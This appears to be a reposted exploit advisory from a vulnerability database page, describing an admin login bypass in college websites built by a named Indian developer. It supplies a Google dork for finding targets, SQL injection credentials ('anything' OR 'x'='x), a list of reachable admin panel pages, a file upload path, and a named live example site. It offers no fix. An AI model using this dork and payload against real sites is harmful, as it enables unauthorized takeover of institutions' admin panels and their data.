Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability

2018.06.29

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-592

Dork: intext:''Design By Dr. Hardik Desai | Developed By Chirag Lad''

#################################################################################################
# Exploit Title : Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : chiraglad.in
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Design By Dr. Hardik Desai | Developed By Chirag Lad''
# Administration Control Panel Path => /admin/
# Exploit : Both are correct login credentials [ '=''or' ] or [ anything' OR 'x'='x ]
Username : anything' OR 'x'='x
Password : anything' OR 'x'='x
Useable Administration Control Panel URL Links =>
/admin/dashboard.php
/admin/about_index.php
/admin/about_edit.php
/admin/trustees_index.php
/admin/trustees_edit.php
/admin/facilities_index.php
/admin/facilities_edit.php
/admin/college_index.php
/admin/college_edit.php
/admin/course_edit.php
/admin/course_index.php
/admin/coursecontent_index.php
/admin/coursecontent_create.php
/admin/faculty_index.php
/admin/faculty_edit.php
/admin/comittees_index.php
/admin/comittees_create.php
/admin/activitymenu_index.php
/admin/activitymaster_index.php
/admin/activitymaster_edit.php
/admin/activitysub_index.php
/admin/activitysub_edit.php
/admin/activityrecords_index.php
/admin/activityrecords_edit.php
/admin/awardscategory_index.php
/admin/awards_index.php
/admin/awards_edit.php
/admin/placementmenu_index.php
/admin/placementmenu_edit.php
/admin/placement_index.php
/admin/placement_create.php
/admin/contact_details.php
/admin/alumni_details.php
/admin/news_index.php
/admin/news_create.php
/admin/staff_index.php
/admin/staff_create.php
/admin/change_password.php
Uploaded Files Path through Admin Panel =>
/admin/uploaded_files/[RANDOM-NUMBERS-ALPAHETS-yourfilename.png] .jpg .gif .pdf .html .htm shtml.jpg
#################################################################################################
# Example Site => naranlalacollege.in => [ Proof of Concept for the Vulnerability ] => archive.is/4mYlj
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability

Dork: intext:''Design By Dr. Hardik Desai | Developed By Chirag Lad''

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.